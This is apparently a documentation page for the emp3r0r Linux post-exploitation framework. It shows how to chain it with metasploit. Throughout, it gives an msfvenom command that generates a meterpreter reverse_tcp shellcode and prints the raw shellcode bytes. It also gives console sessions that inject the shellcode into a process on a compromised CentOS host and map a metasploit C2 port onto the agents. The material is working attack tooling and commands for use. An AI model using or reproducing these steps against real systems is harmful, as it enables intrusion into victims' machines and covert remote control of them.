Interoperability with metasploit and other C2 frameworks

Shellcode loading
- Generate and format shellcode
- Run shellcode loader in emp3r0r
Reverse port mapping

Shellcode loading

Generate and format shellcode

Take metasploit as an example, you can easily generate a (staged) shellcode for meterpreter with the following command:

$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw -o shellcode.bin
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 130 bytes
Saved as: shellcode.bin

Note that we are using 127.0.0.1 as C2 address, this way we can encapsulate meterpreter inside emp3r0r's transport with reverse port mapping.

To format this shellcode for emp3r0r:

$ xxd -i shellcode.bin | grep 0x | tr -d '[:space:]' | tr -d ',' | sed 's/0x/\\x/g' | tee shellcode.txt
\x48\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9\x6a\x22\x41\x5a\xb2\x07\x0f\x05\x48\x85\xc0\x78\x51\x6a\x0a\x41\x59\x50\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x85\xc0\x78\x3b\x48\x97\x48\xb9\x02\x00\x11\x5c\x7f\x00\x00\x01\x51\x48\x89\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x59\x48\x85\xc0\x79\x25\x49\xff\xc9\x74\x18\x57\x6a\x23\x58\x6a\x00\x6a\x05\x48\x89\xe7\x48\x31\xf6\x0f\x05\x59\x59\x5f\x48\x85\xc0\x79\xc7\x6a\x3c\x58\x6a\x01\x5f\x0f\x05\x5e\x6a\x7e\x5a\x0f\x05\x48\x85\xc0\x78\xed\xff\xe6

Save shellcode.txt under /tmp/emp3r0r/www before using injector module.

Run shellcode loader in emp3r0r

2021/01/12 16:27:02
[0] Knock.. Knock...
d5966a56 from 192.168.122.40:51306 - HTTP2 (https://192.168.122.1), running 'CentOS Linux 7 (Core) 7'

emp3r0r > use injector
Using module 'injector'

emp3r0r (injector) > set method native

emp3r0r (injector) > target 0

emp3r0r (injector) > info
Option          Value
======          =====

pid             0
method          native
module          injector
target          0

emp3r0r (injector) > run
2021/01/12 16:27:25 Please wait...
2021/01/12 16:27:25 The shellcode will live in `sleep` process, you will get notified when it exits

2021/01/12 16:38:32
[0] !inject native 0:
native has successfully injected shellcode into target process

emp3r0r (injector) >

Reverse port mapping

Understand how it works

Here is a diagram:

metasploit C2 --> emp3r0r C2 ---> agent

metasploit C2's port gets mapped onto agent, thus making it available to every emp3r0r agent under emp3r0r C2's command.

If your emp3r0r C2 is using a different transport such as TOR/CDN, your meterpreter will be using them as well. And those agents who don't have internet access can connect to metasploit C2 via emp3r0r's auto proxy feature.

Set up port mapping in emp3r0r

Assuming metasploit is listening on 192.168.122.87:4444, and we want it available on agent as 0.0.0.0:4444

emp3r0r (injector) > use port_fwd
Using module 'port_fwd'

emp3r0r (port_fwd) > set switch reverse

emp3r0r (port_fwd) > set to 192.168.122.87:4444

emp3r0r (port_fwd) > set listen_port 4444

emp3r0r (port_fwd) > target 0

emp3r0r (port_fwd) > info
Option          Value
======          =====

module          port_fwd
target          0
to              192.168.122.87:4444
listen_port     4444
switch          reverse

emp3r0r (port_fwd) > run

Load shellcode

It's the same process as Run shellcode loader in emp3r0r

emp3r0r linux post-exploitation

Provide feedback

Saved searches

Use saved searches to filter your results more quickly